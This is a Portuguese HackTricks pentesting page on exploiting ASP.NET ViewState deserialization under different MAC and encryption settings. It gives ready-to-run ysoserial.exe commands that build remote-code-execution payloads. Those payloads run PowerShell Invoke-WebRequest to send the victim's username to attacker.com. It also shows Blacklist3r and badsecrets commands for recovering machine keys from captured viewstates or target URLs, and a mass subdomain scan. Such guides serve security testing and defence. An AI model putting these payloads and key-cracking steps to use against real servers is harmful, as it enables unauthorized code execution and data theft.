hacktricks/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

17 KiB
Raw Blame History

Explorando __VIEWSTATE sem conhecer os segredos

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Se você está interessado em carreira de hacking e hackear o inhackeável - estamos contratando! (fluência em polonês escrita e falada necessária).

{% embed url="https://www.stmcyber.com/careers" %}

O que é ViewState

ViewState serve como o mecanismo padrão no ASP.NET para manter dados de página e controle em páginas da web. Durante a renderização do HTML de uma página, o estado atual da página e os valores a serem preservados durante um postback são serializados em strings codificadas em base64. Essas strings são então colocadas em campos ViewState ocultos.

As informações do ViewState podem ser caracterizadas pelas seguintes propriedades ou suas combinações:

  • Base64:

  • Este formato é utilizado quando os atributos EnableViewStateMac e ViewStateEncryptionMode são definidos como false.

  • Base64 + MAC (Código de Autenticação de Mensagem) Habilitado:

  • A ativação do MAC é alcançada definindo o atributo EnableViewStateMac como true. Isso fornece verificação de integridade para os dados do ViewState.

  • Base64 + Criptografado:

  • A criptografia é aplicada quando o atributo ViewStateEncryptionMode é definido como true, garantindo a confidencialidade dos dados do ViewState.

Casos de Teste

A imagem é uma tabela detalhando diferentes configurações para ViewState no ASP.NET com base na versão do framework .NET. Aqui está um resumo do conteúdo:

  1. Para qualquer versão do .NET, quando tanto o MAC quanto a Criptografia estão desativados, não é necessário um MachineKey e, portanto, não há um método aplicável para identificá-lo.

  2. Para versões abaixo de 4.5, se o MAC estiver habilitado mas a Criptografia não estiver, é necessário um MachineKey. O método para identificar o MachineKey é referido como "Blacklist3r."

  3. Para versões abaixo de 4.5, independentemente de o MAC estar habilitado ou desabilitado, se a Criptografia estiver habilitada, é necessário um MachineKey. Identificar o MachineKey é uma tarefa para "Blacklist3r - Desenvolvimento Futuro."

  4. Para versões 4.5 e superiores, todas as combinações de MAC e Criptografia (se ambos forem true, ou um for true e o outro false) exigem um MachineKey. O MachineKey pode ser identificado usando "Blacklist3r."

Caso de Teste: 1 EnableViewStateMac=false e viewStateEncryptionMode=false

Também é possível desativar completamente o ViewStateMAC definindo a chave de registro AspNetEnforceViewStateMac como zero em:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}

Identificação de Atributos do ViewState

Você pode tentar identificar se o ViewState está protegido por MAC capturando uma solicitação contendo esse parâmetro com o BurpSuite. Se o Mac não for usado para proteger o parâmetro, você pode explorá-lo usando YSoSerial.Net

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

Os desenvolvedores podem remover o ViewState de se tornar parte de uma Requisição HTTP (o usuário não receberá esse cookie).
Pode-se assumir que se o ViewState não estiver presente, sua implementação está segura contra possíveis vulnerabilidades relacionadas à desserialização do ViewState.
No entanto, isso não é verdade. Se adicionarmos o parâmetro ViewState ao corpo da requisição e enviarmos nosso payload serializado criado usando ysoserial, ainda seremos capazes de alcançar a execução de código como mostrado no Caso 1.

Caso de Teste: 2 - .Net < 4.5 e EnableViewStateMac=true & ViewStateEncryptionMode=false

Para ativar o MAC do ViewState para uma página específica, precisamos fazer as seguintes alterações em um arquivo aspx específico:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>

Podemos também fazê-lo para a aplicação como um todo configurando-o no arquivo web.config conforme mostrado abaixo:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>

Como o parâmetro está protegido por MAC desta vez, para executar com sucesso o ataque, primeiro precisamos do chave usada.

Você pode tentar usar Blacklist3r(AspDotNetWrapper.exe) para encontrar a chave usada.

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value

Badsecrets é outra ferramenta que pode identificar machineKeys conhecidos. É escrita em Python, então, ao contrário do Blacklist3r, não há dependência do Windows. Para viewstates .NET, há um utilitário "python blacklist3r", que é a maneira mais rápida de usá-lo.

Pode ser fornecido diretamente com o viewstate e o gerador:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE

https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png

Ou, pode se conectar diretamente à URL de destino e tentar extrair o viewstate do HTML:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx

https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png

Para procurar por viewstates vulneráveis em escala, em conjunto com a enumeração de subdomínios, o módulo badsecrets pode ser usado:

bbot -f subdomain-enum -m badsecrets -t evil.corp

https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png

Se tiver sorte e encontrar a chave, você pode prosseguir com o ataque usando YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}

Em casos em que o parâmetro _VIEWSTATEGENERATOR não é enviado pelo servidor, você não precisa fornecer o parâmetro --generator, mas estes sim:

--apppath="/" --path="/hello.aspx"

Caso de Teste: 3 - .Net < 4.5 e EnableViewStateMac=true/false e ViewStateEncryptionMode=true

Neste caso, não se sabe se o parâmetro está protegido com MAC. Então, o valor provavelmente está criptografado e você precisará da Chave da Máquina para criptografar sua carga útil para explorar a vulnerabilidade.

Neste caso, o Blacklist3r módulo está em desenvolvimento...

Antes do .NET 4.5, o ASP.NET pode aceitar um parâmetro ___VIEWSTATE_ não criptografado dos usuários mesmo se ViewStateEncryptionMode estiver definido como Always. O ASP.NET apenas verifica a presença do parâmetro __VIEWSTATEENCRYPTED na solicitação. Se alguém remover este parâmetro e enviar a carga útil não criptografada, ela ainda será processada.

Portanto, se os atacantes encontrarem uma maneira de obter a Chave da Máquina por meio de outra vulnerabilidade como travessia de arquivos, o comando YSoSerial.Net usado no Caso 2, pode ser usado para realizar RCE usando a vulnerabilidade de desserialização do ViewState.

  • Remova o parâmetro __VIEWSTATEENCRYPTED da solicitação para explorar a vulnerabilidade de desserialização do ViewState, caso contrário, retornará um erro de validação de MAC do ViewState e a exploração falhará.

Caso de Teste: 4 - .Net >= 4.5 e EnableViewStateMac=true/false e ViewStateEncryptionMode=true/false exceto ambos os atributos como false

Podemos forçar o uso do framework ASP.NET especificando o parâmetro abaixo dentro do arquivo web.config conforme mostrado abaixo.

<httpRuntime targetFramework="4.5" />

Alternativamente, isso pode ser feito especificando a opção abaixo dentro do parâmetro machineKey do arquivo web.config.

compatibilityMode="Framework45"

Como no exemplo anterior, o valor está criptografado. Portanto, para enviar uma carga útil válida, o atacante precisa da chave.

Você pode tentar usar Blacklist3r(AspDotNetWrapper.exe) para encontrar a chave sendo usada:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}

Para obter uma descrição mais detalhada sobre IISDirPath e TargetPagePath consulte aqui

Ou, com Badsecrets (com um valor de gerador):

cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415

Uma vez que uma chave de Máquina válida é identificada, o próximo passo é gerar um payload serializado usando YSoSerial.Net

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

Se você tiver o valor de __VIEWSTATEGENERATOR, você pode tentar usar o parâmetro --generator com esse valor e omitir os parâmetros --path e --apppath

Uma exploração bem-sucedida da vulnerabilidade de desserialização do ViewState resultará em uma solicitação out-of-band para um servidor controlado pelo atacante, que inclui o nome de usuário. Esse tipo de exploit é demonstrado em uma prova de conceito (PoC) que pode ser encontrada em um recurso intitulado "Explorando a Desserialização do ViewState usando Blacklist3r e YsoSerial.NET". Para mais detalhes sobre como funciona o processo de exploração e como utilizar ferramentas como Blacklist3r para identificar o MachineKey, você pode revisar o PoC de Exploração Bem-Sucedida.

Caso de Teste 6 ViewStateUserKeys está sendo usado

A propriedade ViewStateUserKey pode ser usada para defender contra um ataque CSRF. Se uma chave desse tipo foi definida na aplicação e tentarmos gerar a carga útil do ViewState com os métodos discutidos até agora, a carga útil não será processada pela aplicação.
Você precisa usar mais um parâmetro para criar corretamente a carga útil:

--viewstateuserkey="randomstringdefinedintheserver"

Resultado de uma Exploração Bem-sucedida

Para todos os casos de teste, se a carga útil ViewState YSoSerial.Net funcionar com sucesso, o servidor responde com "Erro interno do servidor 500" tendo o conteúdo da resposta "As informações de estado são inválidas para esta página e podem estar corrompidas" e obtemos a solicitação OOB.

Verifique mais informações aqui

Referências

Se você está interessado em uma carreira de hacking e hackear o inhackeável - estamos contratando! (fluência em polonês escrita e falada necessária).

{% embed url="https://www.stmcyber.com/careers" %}

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: